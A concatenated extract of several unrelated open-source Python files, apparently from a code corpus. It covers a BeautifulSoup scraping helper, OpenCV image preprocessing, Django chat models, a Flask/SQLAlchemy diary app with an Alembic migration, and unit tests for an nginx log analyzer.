if attribute==">text":
extract = el.text
elif attribute==">inner_markup":
extract = el.decode_contents()
elif attribute==">outer_markup":
extract = str(el)
elif attribute==">rasam":
extract = AwesomeRasam(el)
else:
extract = el.get(attribute)
if extract is None:
if attribute_flag:
raise AttributeIsNone("selector={} & attribute={}".format(selector, attribute))
else:
return fallback
if callable(pipe):
pipe = [pipe]
for f in pipe:
extract = f(extract)
return extract
def get(self, selector, attribute, pipe=[], flag=True, fallback=None):
if selector==">self":
el = self._soup
else:
el = self._soup.select_one(selector)
if el:
pass
elif flag:
raise ElementNotFound(selector)
else:
return fallback
return AwesomeRasam._get_attribute(el, selector, attribute, pipe, flag, fallback)
def get_all(self, selector, attribute, pipe=[], flag=True, attribute_flag=True, fallback=None):
el_list = self._soup.select(selector)
if el_list:
pass
elif flag:
raise NoElementsFound(selector)
else:
return []
results = []
for el in el_list:
results.append(AwesomeRasam._get_attribute(el, selector, attribute, pipe, attribute_flag, fallback))
return results
class UnsupportedInitializer(Exception):
pass
class ElementNotFound(Exception):
pass
class NoElementsFound(Exception):
pass
class AttributeIsNone(Exception):
pass
if __name__=="__main__":
pass
'''url = "https://wios.xyz"
print(AwesomeRasam(url, headers={"User-Agent": "Bot"})._soup.title)
r = requests.get(url)
print(AwesomeRasam(r.text, features="html5lib")._soup.title)
print(AwesomeRasam(BeautifulSoup(r.text, features="html5lib"))._soup.title)
AwesomeRasam(6, headers={"User-Agent": "Bot"})
rasam = AwesomeRasam("https://wios.xyz", delay=1)
print(rasam.get("header",">text"))
print(rasam.get("header",">inner_markup"))
print(rasam.get("header",">outer_markup"))
print(rasam.get("header",">rasam").get("a",">rasam").get(">self",">outer_markup"))
print(rasam.get("a[href^='https://']","href",pipe = [
lambda x: x.split("https://")[1],
lambda x: "http://" + x
]))
rasam = AwesomeRasam("https://1upkd.com", delay=1)
print(rasam.get_all("a[href^='https://']","href",pipe=[
lambda x: AwesomeRasam(x, delay=1).get("title",">text",flag=False)
],attribute_flag=False, fallback="lol"))'''
``` |
{
"source": "1uvu/aae-hash",
"score": 2
} |
#### File: aae-hash/aae_hash/utils.py
```python
from torchvision.utils import make_grid
from PIL import Image
import torch
import shutil
import re
import cv2 as cv
import numpy as np
import os
from setting import INPUT_DIR, TRAIN_DIR
# Structuring element (kernel) for the morphological operations; it can be
# customized or created via the OpenCV API.
kernel = cv.getStructuringElement(cv.MORPH_ELLIPSE, (25, 25))
dCount = 6  # number of dilation iterations
eCount = 1  # number of erosion iterations
# Helper methods for image preprocessing; the `control` argument selects
# which operation a method applies.
class imgTools():
def __init__(self):
pass
    # Convert the image to grayscale
def imgGray(self, img):
self.grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
return self.grayImg
    # Intensity transform (gamma correction / linear contrast stretch)
def imgConver(self, grayImg):
fi = grayImg / 255
gamma = 2
self.newImg = np.power(fi, gamma)
self.newImg = np.uint8(np.clip((1.5 * grayImg + 15), 0, 255))
return self.newImg
    # Contrast enhancement (CLAHE)
def imgEnhance(self, grayImg):
clahe = cv.createCLAHE(clipLimit=5.0, tileGridSize=(2, 2))
self.enhanceImg = clahe.apply(grayImg)
return self.enhanceImg
    # Gaussian smoothing
def imgBlur(self, img):
self.blurImg = cv.GaussianBlur(img, (11, 11), 0)
return self.blurImg
    # Binarization with Otsu's threshold
def imgBinary(self, grayImg):
(_, self.thresh) = cv.threshold(grayImg, 0, 255, cv.THRESH_OTSU)
return self.thresh
    # Morphological erosion / dilation
def imgMorp(self, control, thresh):
        # Opening
# kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (25, 25))
self.closed = cv.morphologyEx(thresh, cv.MORPH_CLOSE, kernel)
if control == 'open':
            self.closed = cv.dilate(self.closed, None, iterations=dCount)  # dCount dilation passes
            self.closed = cv.erode(self.closed, None, iterations=eCount)  # eCount erosion passes
return self.closed
        # Closing
elif control == 'close':
            self.closed = cv.erode(self.closed, None, iterations=eCount)  # erode
            self.closed = cv.dilate(self.closed, None, iterations=dCount)  # dilate
return self.closed
        # Other morphological operations
else:
pass
imgTools = imgTools()
# The image segmentation algorithm needs improvement
def img_cut(path):
# print(path)
img = cv.imread(path)
print(img.shape)
grayImg = imgTools.imgGray(img)
newImg = imgTools.imgConver(grayImg)
blurImg = imgTools.imgBlur(newImg)
enhanceImg = imgTools.imgEnhance(blurImg)
canny = cv.Canny(enhanceImg, 50, 50 * 3, apertureSize=3)
thresh = imgTools.imgBinary(canny)
closed = imgTools.imgMorp('open', thresh)
cnts, _ = cv.findContours(
closed.copy(),
cv.RETR_EXTERNAL,
cv.CHAIN_APPROX_SIMPLE
)
c = sorted(cnts, key=cv.contourArea, reverse=True)[0]
rect = cv.minAreaRect(c)
box = np.int0(cv.boxPoints(rect))
Xs = [i[0] for i in box]
Ys = [i[1] for i in box]
x1 = min(Xs)
x2 = max(Xs)
y1 = min(Ys)
y2 = max(Ys)
if x1 > 0 and y1 > 0:
pass
else:
x1 = 0
y1 = 0
hight = y2 - y1
width = x2 - x1
cutImg = img[y1:y1 + hight, x1:x1 + width]
cv.imwrite('./temp.jpg', cutImg)
cv.imshow('cut', cutImg)
cv.waitKey()
cv.destroyAllWindows()
return cutImg
def img_reshape(args):
os.makedirs(TRAIN_DIR + "imgs/", exist_ok=True)
img_list = os.listdir(INPUT_DIR)
count = 0
for im in img_list:
img_path = INPUT_DIR + im
try:
img = img_cut(img_path)
img = cv.resize(img, (args.img_size, args.img_size))
cv.imwrite(TRAIN_DIR + "imgs/" + im, img)
count += 1
except:
print(INPUT_DIR + im)
def parse_img(tensor, nrow=8, padding=2,
normalize=False, range=None, scale_each=False, pad_value=0):
grid = make_grid(tensor, nrow=nrow, padding=padding, pad_value=pad_value,
normalize=normalize, range=range, scale_each=scale_each)
# Add 0.5 after unnormalizing to [0, 255] to round to nearest integer
ndarr = grid.mul_(255).add_(0.5).clamp_(0, 255).permute(1, 2, 0).to('cpu', torch.uint8).numpy()
im = Image.fromarray(ndarr)
return im
def img_migrate(ori_p, img_list=[]):
os.makedirs(INPUT_DIR, exist_ok=True)
dir_list = os.listdir(ori_p)
if len(dir_list) > 0:
for name in dir_list:
path = ori_p + name
if os.path.isdir(path):
path+="/"
print("dir: ", path)
img_list = img_migrate(path, img_list)
else:
name = name.lower()
t = re.split(r"\.", name)
img = ""
for i in range(len(t)-1):
                    img += re.sub(r"\W", "", t[i])
img = img + "." + t[-1]
print("img: ", img)
img_list.append(img)
shutil.copyfile(path, INPUT_DIR+img)
# os.remove(path)
return img_list
if __name__ == '__main__':
print("不支持直接运行!!!")
``` |
{
"source": "1uvu/english-reading",
"score": 3
} |
#### File: scripts/src/analysis.py
```python
import json
def word_handle(data):
word_dict = {}
y = 2010
for d in data:
print(d)
text = d["text"]
word_list = []
for t in text:
words = t["words"]
word_list.append(words)
word_dict[str(y)] = word_list
y += 1
return word_dict
if __name__ == "__main__":
js = open("../../output/word.json", "r").read()
data = json.loads(js)["data"]
word_dict = word_handle(data)
``` |
{
"source": "1uvu/webchat",
"score": 2
} |
#### File: webchat/chat/models.py
```python
from django.contrib.auth.models import User
from django.db import models
class ChatMessage ( models.Model ):
"""
    Model to represent user-submitted changes to a resource guide
"""
user = models.ForeignKey ( User, on_delete = models.CASCADE )
group_name = models.TextField ()
message = models.TextField ()
created = models.DateTimeField ( auto_now_add = True )
def __str__ (self):
"""
String to represent the message
"""
return self.message
class Meta:
verbose_name = 'chat_message'
# -*- coding: utf-8 -*-
from django.db import models
from model_utils.models import TimeStampedModel, SoftDeletableModel
from django.conf import settings
from django.template.defaultfilters import date as dj_date
from django.utils.translation import ugettext as _
from django.utils.timezone import localtime
class Dialog(TimeStampedModel):
owner = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("Dialog owner"), related_name="selfDialogs",
on_delete=models.CASCADE)
opponent = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("Dialog opponent"), on_delete=models.CASCADE)
def __str__(self):
return _("Chat with ") + self.opponent.name
class Message(TimeStampedModel, SoftDeletableModel):
dialog = models.ForeignKey(Dialog, verbose_name=_("Dialog"), related_name="messages", on_delete=models.CASCADE)
sender = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("Author"), related_name="messages",
on_delete=models.CASCADE)
text = models.TextField(verbose_name=_("Message text"))
read = models.BooleanField(verbose_name=_("Read"), default=False)
all_objects = models.Manager()
def get_formatted_create_datetime(self):
return dj_date(localtime(self.created), settings.DATETIME_FORMAT)
def __str__(self):
return self.sender.name + "(" + self.get_formatted_create_datetime() + ") - '" + self.text + "'"
``` |
{
"source": "1uy31/django-app-boilerplate",
"score": 2
} |
#### File: django-app-boilerplate/tests/test_dummy.py
```python
from django.conf import settings
def test_dummy():
assert settings.ALLOWED_HOSTS == ["*"]
``` |
{
"source": "1uy31/learning-diary",
"score": 3
} |
#### File: core/models/category.py
```python
from dataclasses import dataclass
from flask import current_app
from sqlalchemy import Column, String
from sqlalchemy.orm import relationship
from .base import ModelMixin, TimestampMixin
from .database import DatabaseConnector
with current_app.app_context():
# Need to use db.Model for migrations to be detected.
db = current_app.extensions["migrate"].db
class Category(ModelMixin, TimestampMixin, db.Model): # type: ignore
name = Column(String(256), nullable=False, unique=True)
diaries = relationship("Diary", back_populates="category")
def __str__(self):
return f"<Category: {self.name}>"
@dataclass
class CategoryConnector:
model = Category
database_helper = DatabaseConnector()
def delete_category_by_name(self, name: str):
"""
Delete matched Category object from database.
:param name:
:return:
:raise: Exception if fail
"""
category = db.session.query(self.model).filter(self.model.name == name).first()
if not category:
raise Exception(f"There is no Category with name {name}.")
db.session.delete(category)
db.session.commit()
```
#### File: migrations/versions/47454edab16c_.py
```python
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "47454edab16c"
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"category",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column(
"created_at",
sa.DateTime(timezone=True),
server_default=sa.text("now()"),
nullable=True,
),
sa.Column("updated_at", sa.DateTime(timezone=True), nullable=True),
sa.Column("name", sa.String(length=256), nullable=False),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("name"),
)
op.create_table(
"note",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column(
"created_at",
sa.DateTime(timezone=True),
server_default=sa.text("now()"),
nullable=True,
),
sa.Column("updated_at", sa.DateTime(timezone=True), nullable=True),
sa.Column(
"position",
sa.SmallInteger(),
nullable=False,
comment="The position of each note in a diary.",
),
sa.Column("text", sa.Text(), nullable=True),
sa.Column("image_url", sa.String(length=256), nullable=True),
sa.Column("source_url", sa.String(length=256), nullable=True),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("position"),
)
op.create_table(
"diary",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column(
"created_at",
sa.DateTime(timezone=True),
server_default=sa.text("now()"),
nullable=True,
),
sa.Column("updated_at", sa.DateTime(timezone=True), nullable=True),
sa.Column("topic", sa.String(), nullable=False),
sa.Column("category", sa.Integer(), nullable=True),
sa.Column("note", sa.Integer(), nullable=True),
sa.Column("source_url", sa.String(length=256), nullable=True),
sa.Column("review_count", sa.SmallInteger(), nullable=True),
sa.Column("rate", sa.SmallInteger(), nullable=True),
sa.ForeignKeyConstraint(["category"], ["category.id"], ondelete="RESTRICT"),
sa.ForeignKeyConstraint(["note"], ["note.id"], ondelete="CASCADE"),
sa.PrimaryKeyConstraint("id"),
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table("diary")
op.drop_table("note")
op.drop_table("category")
# ### end Alembic commands ###
``` |
{
"source": "1v1a3x/pyinsights",
"score": 2
} |
#### File: pyinsights/pyinsights/config.py
```python
import json
from dataclasses import dataclass, asdict
from functools import cached_property
from pathlib import Path
from typing import Any, Dict, List, NamedTuple, Union
from jsonschema import Draft7Validator
from jsonschema.exceptions import ValidationError
from yaml import safe_load
from pyinsights.exceptions import (
ConfigInvalidSyntaxError,
ConfigNotFoundError,
ConfigVersionUnknownError,
InvalidVersionError
)
from pyinsights.helper import (
convert_to_epoch,
convert_string_duration_to_datetime,
DatetimeType
)
ConfigType = Dict[str, Any]
SchemaType = Dict[str, Any]
class ConfigFile(NamedTuple):
filename: str
content: ConfigType
@classmethod
def from_filename(cls, filename) -> 'ConfigFile':
return cls(filename, load_yaml(filename))
@property
def version(self) -> str:
try:
return self.content['version']
except KeyError:
raise ConfigVersionUnknownError(
'Please Specify configuration version'
)
def convert_duration(self) -> Dict[str, int]:
duration = self.content['duration']
if isinstance(duration, str):
duration = convert_string_duration_to_datetime(duration)
duration_epoch = {
key: convert_to_epoch(value)
for key, value in duration.items()
}
return duration_epoch
def get_query_params(self) -> ConfigType:
params = self.content.copy()
new_duration = self.convert_duration()
del params['version']
del params['duration']
params.update(new_duration)
return params
def load_config(filepath: str) -> ConfigFile:
"""Load configuration
Arguments:
filepath {str}
Returns:
        {ConfigFile} -- validated configuration file
"""
config = ConfigFile.from_filename(filepath)
validate(config.content, config.version)
return config
def load_yaml(filepath: str) -> ConfigType:
"""Load YAML configuration file
Arguments:
filepath {str}
Raises:
ConfigNotFoundError
Returns:
config {ConfigType}
"""
try:
with open(filepath) as fd:
return safe_load(fd)
except FileNotFoundError:
raise ConfigNotFoundError('Could not find the configuration')
def load_schema(version: str) -> SchemaType:
"""Load the schema json file
Arguments:
version {str}
Raises:
InvalidVersionError
Returns:
schema {SchemaType}
"""
basepath = Path(__file__).parent.resolve()
filename = f'version_{version}.json'
    schema_filepath = f'{basepath}/schema/{filename}'
    try:
        with open(schema_filepath) as fd:
return json.load(fd)
except FileNotFoundError:
raise InvalidVersionError(f'The version {repr(version)} is invalid')
def validate(config: ConfigType, version: str) -> bool:
"""Validate the configuration
Arguments:
config {ConfigType}
version {str}
Raises:
ConfigInvalidSyntaxError
Returns:
bool
"""
try:
schema = load_schema(version)
Draft7Validator(schema).validate(config)
except ValidationError as err:
raise ConfigInvalidSyntaxError(err)
except Exception as err:
raise err
else:
return True
```
#### File: pyinsights/pyinsights/formatter.py
```python
import json
import shutil
from typing import Dict, List, Type
QueryResult = Type[List[List[Dict[str, str]]]]
class Formatter:
def __init__(self, format_type: str = 'json') -> None:
"""
Keyword Arguments:
format_type {str} -- [description] (default: {'json'})
"""
self.format_type = format_type
def _to_pretty_dict(self, results: QueryResult) -> List[Dict[str, str]]:
"""Format results to python dict in list
Arguments:
results {QueryResult}
Returns:
List[Dict[str, str]]
"""
formatted_result = [
{
field['field']: field['value']
for field in result if field['field'] != '@ptr'
}
for result in results
]
return formatted_result
def to_json(self, results: QueryResult) -> str:
"""Format results to json
Arguments:
results {QueryResult}
Returns:
str
"""
if not results:
return ''
        tmp_results = self._to_pretty_dict(results)
        formatted_result = json.dumps(tmp_results, indent=2, ensure_ascii=False)
return formatted_result
def to_table(self, results: QueryResult) -> str:
"""Format results to string table
Arguments:
results {QueryResult}
Returns:
str
"""
if not results:
return ''
tmp_results = self._to_pretty_dict(results)
headers = list(tmp_results[0].keys())
width, _ = shutil.get_terminal_size()
length_per_column = width // len(headers)
table_header = ''
for header in headers:
table_header += header.ljust(length_per_column)
table_record = ''
for result in tmp_results:
for field in result.values():
table_record += \
field[:length_per_column - 2].ljust(length_per_column)
table_record += '\n'
formatted_result = f'{table_header}\n{table_record}'
return formatted_result
def format_result(
format_type: str,
results: QueryResult
) -> str:
"""Format the query result
Arguments:
format_type {str}: json or table
results {QueryResult}
Returns:
str
"""
formatter = Formatter(format_type)
func = getattr(formatter, f'to_{format_type}')
formatted_result = func(results)
return formatted_result
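if __name__ == '__main__':
    # Hedged demo (added for illustration; not part of the original file).
    # A single Logs Insights result row: the '@ptr' field is dropped by
    # _to_pretty_dict(), and the remaining fields are rendered either as
    # pretty-printed JSON or as a terminal-width table.
    sample_results = [[
        {'field': '@timestamp', 'value': '2021-01-01 00:00:00.000'},
        {'field': '@message', 'value': 'GET /healthz 200'},
        {'field': '@ptr', 'value': 'opaque-pointer'},
    ]]
    print(format_result('json', sample_results))
    print(format_result('table', sample_results))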
```
#### File: pyinsights/pyinsights/helper.py
```python
import sys
import random
from datetime import datetime, timedelta
from typing import Dict, Type, Union
from pyinsights.exceptions import InvalidDurationError
DatetimeType = Type[datetime]
def convert_to_epoch(duration: Union[str, DatetimeType]) -> int:
"""Convert datetime string to epoch (POSIX timestamp)
Arguments:
duration {Union[str, DatetimeType]}
-- string format must be `%Y-%m-%d %H:%M:%S`
if duration type is str
Raises:
InvalidDurationError
Returns:
epoch {int}
"""
if isinstance(duration, str):
time_format = '%Y-%m-%d %H:%M:%S'
try:
duration = datetime.strptime(duration, time_format)
except ValueError:
raise InvalidDurationError(
f'{duration=} is invalid datetime format as \
duration parameter'
)
if not isinstance(duration, datetime):
raise InvalidDurationError(
f'Cloud not convert {duration=} to POSIX timestamp'
)
epoch = int(duration.timestamp())
return epoch
TIME_UNITS = {
's': 'seconds',
'm': 'minutes',
'h': 'hours',
'd': 'days',
'w': 'weeks'
}
def convert_string_duration_to_datetime(
string_duration: str
) -> Dict[str, DatetimeType]:
"""Convert string duration to datetime
Arguments:
string_duration {str}
Raises:
InvalidDurationError
Returns:
Dict[str, DatetimeType] -- `start_time` and `end_time` are key
"""
try:
duration = {
TIME_UNITS[string_duration[-1]]: int(string_duration[:-1])
}
except (ValueError, IndexError, KeyError):
raise InvalidDurationError(
f'{string_duration=} is invalid as duration parameter'
)
end_time = datetime.now()
start_time = end_time - timedelta(**duration)
    duration_map = {
        'start_time': start_time,
        'end_time': end_time
    }
    return duration_map
def color() -> str:
"""Choice a color
Returns:
str
"""
colors = [
Color.Red,
Color.Green,
Color.Yellow,
Color.Blue,
Color.Purple,
Color.Cyan
]
color = random.choice(colors)
return color
class Color:
Red = '\033[31m'
Green = '\033[32m'
Yellow = '\033[33m'
Blue = '\033[34m'
Purple = '\033[35m'
Cyan = '\033[36m'
class Accessory:
End = '\033[0m'
Accent = '\033[01m'
def processing(msg: str, end: str = '') -> None:
"""Display processing on terminal
Arguments:
msg {str}
Keyword Arguments:
end {str} - - (default: {''})
"""
processing_msg = f'{Accessory.Accent}{color()}{msg}{Accessory.End}{end}'
sys.stdout.write(processing_msg)
sys.stdout.flush()
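if __name__ == '__main__':
    # Hedged demo (added for illustration; not part of the original file).
    # '2h' is expanded to a start/end datetime pair covering the last two
    # hours, which convert_to_epoch() then turns into POSIX timestamps.
    duration = convert_string_duration_to_datetime('2h')
    print({key: convert_to_epoch(value) for key, value in duration.items()})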
``` |
{
"source": "1v1expert/MedAsk",
"score": 2
} |
#### File: management/commands/init_db.py
```python
from django.core.management.base import BaseCommand
from app.models import InsuranceData, InsuranceCompany
from app.choices import OMS, DMS
from django.contrib.auth.models import User
from django.db import models
from datetime import datetime
companies = [
{
'title': 'СК МЕД-АСКЕР',
'phone': '8 (495) 123-45-67'
},
{
'title': 'СК Рандеву',
'phone': '8 (499) 123-45-68'
},
{
'title': 'Страх-трах',
'phone': '8 (812) 123-45-69'
},
]
company_data = [
{
'policy_number': '1234 12345678',
'format_number': '4 8',
'type_of_insurance': DMS,
'expiration_date': '14.08.2020',
'company': 'СК МЕД-АСКЕР'
},
{
'policy_number': '9876 543210',
'format_number': '4 6',
'type_of_insurance': OMS,
'expiration_date': '15.08.2021',
'company': 'СК МЕД-АСКЕР'
},
{
'policy_number': '1234-123456-78',
'format_number': '4-6-2',
'type_of_insurance': DMS,
'expiration_date': '16.08.2022',
'company': 'СК Рандеву'
},
{
'policy_number': '98-76 5432-10',
'format_number': '2-2 4-2',
'type_of_insurance': OMS,
'expiration_date': '24.11.2023',
        'company': 'СК Рандеву'
},
{
'policy_number': '12-341234-5678',
'format_number': '2-6-4',
'type_of_insurance': DMS,
'expiration_date': '25.11.2024',
'company': 'Страх-трах'
},
{
'policy_number': '9876-543210',
'format_number': '4-6',
'type_of_insurance': OMS,
'expiration_date': '26.11.2025',
'company': 'Страх-трах'
}
]
class Command(BaseCommand):
help = 'Database initialization'
def handle(self, *args, **options):
try:
user = User.objects.get(username="tech")
except models.ObjectDoesNotExist:
user = User.objects.create(username="tech", password="password", email="<EMAIL>")
user.save()
if InsuranceCompany.objects.exists():
return
objs = [
InsuranceCompany(
title=company['title'],
phone=company['phone'],
created_by=user,
updated_by=user
)
for company in companies
]
InsuranceCompany.objects.bulk_create(objs)
if InsuranceData.objects.exists():
return
objs_data = [
InsuranceData(
policy_number=data['policy_number'],
format_number=data['format_number'],
type_of_insurance=data['type_of_insurance'],
expiration_date=datetime.strptime(data['expiration_date'], '%d.%m.%Y').date(),
company=InsuranceCompany.objects.get(title=data['company']),
created_by=user,
updated_by=user
)
for data in company_data
]
InsuranceData.objects.bulk_create(objs_data)
```
#### File: MedAsk/app/models.py
```python
from django.db import models
from django.contrib.auth.models import User
from .choices import TYPES
# import uuid
class Base(models.Model):
"""
Абстрактная базовая модель
"""
# uid = models.UUIDField(verbose_name="Идентификатор", primary_key=True, default=uuid.uuid4, editable=False)
created_at = models.DateTimeField(auto_now_add=True, verbose_name="Когда создано")
created_by = models.ForeignKey(User, on_delete=models.PROTECT, verbose_name="Кем создано", editable=False, related_name="+")
updated_at = models.DateTimeField(auto_now=True, verbose_name="Когда обновлено")
updated_by = models.ForeignKey(User, on_delete=models.PROTECT, verbose_name="Кем обновлено", editable=False, related_name="+")
is_public = models.BooleanField("Опубликовано?", default=True)
deleted = models.BooleanField("В архиве?", default=False, editable=False)
class Meta:
abstract = True
verbose_name = "Базовая модель "
verbose_name_plural = "Базовые модели"
class InsuranceCompany(Base):
title = models.CharField(max_length=255, verbose_name='Наименование')
phone = models.CharField(max_length=20, verbose_name='Телефон')
cover = models.ImageField(upload_to='images/', null=True)
class Meta:
verbose_name = "Страховая компания"
verbose_name_plural = "Страховые компании"
def __str__(self):
return self.title
class InsuranceData(Base):
policy_number = models.CharField(verbose_name='Номер СП', max_length=255)
format_number = models.CharField(verbose_name='Формат СП', default=None, max_length=255)
type_of_insurance = models.CharField(max_length=4, choices=TYPES, verbose_name="Тип страхования")
expiration_date = models.DateField(verbose_name='Дата окончания')
company = models.ForeignKey(InsuranceCompany, on_delete=models.CASCADE)
def to_json(self):
return dict(
type_of_insurance=self.type_of_insurance,
expiration_date=self.expiration_date,
company_title=self.company.title,
company_phone=self.company.phone,
img=self.company.cover.url
)
class Meta:
verbose_name = "Данные по СК"
def __str__(self):
return 'Policy number: {}'.format(self.policy_number)
```
#### File: MedAsk/app/util.py
```python
def formalize_police_number(policy_number):
policy = []
i = 0
for cc, item in enumerate(policy_number):
if item.isdigit():
i += 1
else:
if i:
policy.append(str(i))
policy.append(item)
i = 0
else:
policy.append(item)
if cc == len(policy_number) - 1:
policy.append(str(i))
return ''.join(policy)
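if __name__ == '__main__':
    # Hedged demo (added for illustration; not part of the original file).
    # Each run of digits collapses to its length while separators are kept,
    # which is how the `format_number` values used in init_db are derived.
    print(formalize_police_number('1234 12345678'))   # -> '4 8'
    print(formalize_police_number('98-76 5432-10'))   # -> '2-2 4-2'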
``` |
{
"source": "1v1expert/SmartLighting",
"score": 2
} |
#### File: management/commands/periodic_survey.py
```python
from django.core.management.base import BaseCommand
# from core.modbustcp.promodem.client import PromodemClient
from core.models import Promodem
from time import sleep
import logging
logger = logging.getLogger(__name__)
class Command(BaseCommand):
help = 'Periodic get data from devices'
def handle(self, *args, **options):
devices = Promodem.objects.all()
for device in devices:
client = device.get_client()
brightness = client.get_brightness()
wifi_signal = client.get_wifi_signal()
print(device, brightness, wifi_signal)
if brightness is not None:
client.brightness = brightness
device.brightness = brightness
device.save()
if wifi_signal is not None:
client.wifi_signal = wifi_signal
device.wifi_signal = wifi_signal
device.save()
```
#### File: management/commands/test_promodem.py
```python
from django.core.management.base import BaseCommand
from core.modbustcp.promodem.client import PromodemClient
from time import sleep
import logging
logger = logging.getLogger(__name__)
def turn_switch(host="192.168.2.55", bright=0, client=None):
if client is None:
client = PromodemClient(host=host, debug=False, auto_close=False)
client.set_brightness(bright)
# print(client.get_full_info())
logger.info(client.get_full_info())
return client
class Command(BaseCommand):
help = 'Generates Fake data'
def handle(self, *args, **options):
client = turn_switch(host="192.168.2.55", bright=0)
client2 = turn_switch(host="192.168.2.66", bright=0)
# print(client.close())
sleep(1)
turn_switch(bright=0, client=client)
turn_switch(bright=1, client=client2)
sleep(1)
turn_switch(bright=1, client=client)
turn_switch(bright=0, client=client2)
sleep(1)
turn_switch(bright=1, client=client)
turn_switch(bright=1, client=client2)
sleep(1)
turn_switch(bright=0, client=client)
turn_switch(bright=0, client=client2)
sleep(1)
turn_switch(bright=1, client=client)
turn_switch(bright=1, client=client2)
print('GET: {}, WRITE: {}'.format(client.count_get + client2.count_get, client.count_write + client2.count_get))
print(client.close())
print(client2.close())
# client = PromodemClient(host="192.168.1.42", debug=False)
# client.set_brightness(1)
# print(client.get_full_info())
#
# client.set_voltage_inversion(0)
# print(client.get_full_info())
``` |
{
"source": "1vank1n/otus-python-21",
"score": 2
} |
#### File: otus-python-21/hw1/tests.py
```python
import gzip
import json
import logging
import os
import shutil
import tempfile
import unittest
from datetime import datetime
import log_analyzer
CONFIG = {
'REPORT_SIZE': 1000,
'REPORT_DIR': './reports',
'LOG_DIR': './log',
'SUPPORTED_LOG_FORMATS': ['', '.gz'],
'TERMINATED_PERCENT': 100,
'LOGGING_FILE': None,
'LOGGING_FORMAT': '[%(asctime)s] %(levelname).1s %(message)s',
}
class LogAnalyzerTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.test_log_dir = tempfile.mkdtemp()
cls.test_wrong_log_dir = tempfile.mkdtemp()
cls.test_report_dir = tempfile.mkdtemp()
cls.config = log_analyzer.get_config(
config_dict={
'LOG_DIR': cls.test_log_dir,
'REPORT_DIR': cls.test_report_dir,
})
cls.logger = logging.getLogger()
open(f'{cls.test_log_dir}/nginx-access-ui.log-20210223.gz', 'w').close()
open(f'{cls.test_log_dir}/nginx-access-ui.log-20210224.gz', 'w').close()
open(f'{cls.test_log_dir}/nginx-access-ui.log-20210225.gz', 'w').close()
open(f'{cls.test_log_dir}/nginx-access-ui.log-20210226.gz', 'w').close()
open(f'{cls.test_log_dir}/nginx-access-ui.log-20210227.gz', 'w').close()
open(f'{cls.test_log_dir}/nginx-access-ui.log-20210228.gz', 'w').close()
open(f'{cls.test_log_dir}/nginx-access-ui.log-20210299.gz', 'w').close()
open(f'{cls.test_log_dir}/nginx-access-ui.log-20210399.gz', 'w').close()
cls.last_log_filename = f'{cls.test_log_dir}/nginx-access-ui.log-20210301.gz'
cls.COUNT_LINES = 100
cls.REQUEST_TIME = 555
with gzip.open(cls.last_log_filename, 'wb') as f:
line = f'172.16.31.10 - - [29/Jun/2017:03:50:22 +0300] "GET /api/v2/banner/25019354 HTTP/1.1" 200 927 "-" "Lynx/2.8.8dev.9 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/2.10.5" "-" "1498697422-2190034393-4708-9752759" "dc7161be3" {cls.REQUEST_TIME}\n'
for _ in range(cls.COUNT_LINES):
f.write(str.encode(line))
@classmethod
def tearDownClass(cls):
shutil.rmtree(cls.test_log_dir)
shutil.rmtree(cls.test_wrong_log_dir)
shutil.rmtree(cls.test_report_dir)
def tearDown(self):
report_path = f'{self.test_report_dir}/report-2021.03.01.html'
if os.path.exists(report_path):
os.remove(report_path)
def test_get_config(self):
new_config = {
'REPORT_SIZE': 25,
'REPORT_DIR': './reports_new',
'LOG_DIR': './log_new',
'SUPPORTED_LOG_FORMATS': ['', '.gz', '.bz2'],
'TERMINATED_PERCENT': 25,
'NEW_KEY': 'new_value',
}
updated_config = log_analyzer.get_config(config_dict=new_config)
for key in new_config.keys():
self.assertEqual(updated_config[key], new_config[key])
def test_generate_report_filename(self):
log_filename = 'nginx-test-log.gz'
date = datetime(2021, 3, 1)
log_fileinfo = log_analyzer.Fileinfo(
path=os.path.join(self.config['LOG_DIR'], log_filename),
date=date,
extension='.gz',
)
report_fileinfo = log_analyzer.generate_report_filename(
config=self.config,
log_fileinfo=log_fileinfo,
)
self.assertEqual(report_fileinfo['path'], f'{self.test_report_dir}/report-2021.03.01.html')
self.assertEqual(report_fileinfo['date'], date)
self.assertEqual(report_fileinfo['extension'], '.html')
def test_find_log(self):
log_fileinfo = log_analyzer.find_log(config=self.config, logger=self.logger)
self.assertEqual(log_fileinfo['path'], self.last_log_filename)
self.assertEqual(log_fileinfo['date'], datetime(2021, 3, 1))
self.assertEqual(log_fileinfo['extension'], '.gz')
with self.assertRaises(FileNotFoundError):
"""Check wrong log dir"""
config = log_analyzer.get_config(
config_dict={'LOG_DIR': f'{self.test_log_dir}/wrong_path'})
log_analyzer.find_log(config=config, logger=self.logger)
with self.assertRaises(SystemExit):
"""Check dir without log"""
config = log_analyzer.get_config(config_dict={'LOG_DIR': self.test_wrong_log_dir})
log_analyzer.find_log(config=config, logger=self.logger)
def test_check_is_exist_report(self):
report_path = f'{self.test_report_dir}/report-2021.03.01.html'
date = datetime(2021, 3, 1)
log_fileinfo = log_analyzer.Fileinfo(
path=os.path.join(self.config['LOG_DIR'], 'nginx-access-ui.log-20210301.gz'),
date=date,
extension='.gz',
)
with self.assertRaises(SystemExit):
"""Check already generated report"""
open(report_path, 'w').close()
log_analyzer.check_is_exist_report(
config=self.config,
log_fileinfo=log_fileinfo,
logger=self.logger,
)
def test_parse_log(self):
log_fileinfo = log_analyzer.find_log(config=self.config, logger=self.logger)
parsed_log = log_analyzer.parse_log(
config=self.config,
log_fileinfo=log_fileinfo,
logger=self.logger,
)
self.assertEqual(parsed_log['total_count'], self.COUNT_LINES)
